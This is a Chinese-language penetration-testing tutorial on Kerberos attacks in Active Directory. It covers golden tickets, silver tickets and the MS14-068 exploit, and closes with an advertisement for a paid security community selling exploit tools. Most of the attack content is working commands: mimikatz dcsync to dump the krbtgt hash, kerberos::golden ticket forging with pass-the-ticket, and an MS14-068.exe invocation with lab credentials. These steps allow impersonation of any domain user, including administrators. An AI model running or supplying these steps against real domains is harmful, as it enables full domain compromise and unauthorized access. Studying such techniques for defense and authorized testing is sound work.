黄金票据、白银票据与ms14-068

kerberos协议访问请求图

黄金票据

原理

黄金票据的漏洞原理是伪造krbtgt用户的票据，krbtgt用户是域控中用来管理发放票据的用户，拥有了该用户的权限，就可以伪造系统中的任意用户

黄金票据的条件要求

1.域名称 test.com

2.域的SID 值 S-1-5-21-3911998785-1923830468-1006530692（后一段就是机器编号了，不需要）

3.域的KRBTGT账户NTLM密码哈希或者aes-256值

lsadump::dcsync /domain:test.com /user:krbtgt

4fbcddb2c382d2ff788e6b88bc6685f4

4.伪造用户名 administrator

获得以上信息后就可以伪造票据了

删除现有的票据

klist purge

klist 查看当前票据

没有票据时无法访问 dc

伪造票据信息

kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-3911998785-1923830468-1006530692 /krbtgt:4fbcddb2c382d2ff788e6b88bc6685f4 /ptt

之后可以访问

白银票据

原理

白银票据是伪造st（门票），这样的好处是门票不会经过kdc，从而更加隐蔽，但是伪造的门票只对部分服务起作用,如cifs（文件共享服务），mssql，winrm（windows远程管理），dns等等

白银票据的条件要求

1.域全名 WIN-OM48SNJFGAL.test.com

2.域sid S-1-5-21-3911998785-1923830468-1006530692（后一段就是机器编号了，不需要）

3.目标服务器FQDN WIN-OM48SNJFGAL.test.com

4.可利用的服务cifs

5.服务账号的NTML HASH 3a54b6e5168227fc55575efb4c2f21aa（一定要是带$的共享账号）

6.需要伪造的用户名test

伪造票据信息

kerberos::golden /domain:test.com /sid:S-1-5-21-3911998785-1923830468-1006530692 /target:WIN-OM48SNJFGAL.test.com /service:cifs /rc4:3a54b6e5168227fc55575efb4c2f21aa /user:aaa /ptt

ms14-068

原理

ms14068的漏洞原理是伪造域管的tgt

ms14-068利用条件

ms14-068是不需要hash的值,只需要普通域用户的账号和密码即可.还有对应的用户sid值,但是有一个前提就是补丁没有打才可以使用

域用户账号和密码

对应用户sid值

域全名

MS14-068.exe -u aaa@test.com -p admin@123 -s S-1-5-21-3911998785-1923830468-1006530692 -d WIN-OM48SNJFGAL.test.com

导入生成的票据

kerberos::ptc TGT_aaa@test.com.ccache

 知识星球

        高质量安全知识星球社区，致力于漏洞挖掘，渗透技巧，安全资料，星球承诺会持续更新0/1/NDay及对应的批量利用工具，团队内部漏洞库，内外网攻防技巧，你所需要的各类安全工具和资料以及团队师傅们最新的学习研究成果。分享行业内最新动态，解答交流各类技术问题。
涉及方向包括Web渗透、免杀绕过、红蓝攻防、代码审计、应急响应、安全培训、CTF、小白入门、职业规划和疑难解答。CatalyzeSec，安全技术水平的催化者，星球针对成员的技术问题，快速提供思考方向及解决方案，并为星友提供多种方向的学习资料、安全工具、POC&EXP以及各种学习笔记等，以引导者和催化剂的方式助力安全技术水平的提升。
我们是一个快速成长的team，团队的发展方向与每一位星友的学习方向密切相关，加入我们，一起成为更好的自己！
PS：随着星球内知识的积累，人员的增加，星球价格也会随之增加，前一百位加入我们的师傅可享受99元朋友价！

团队内部独家知识库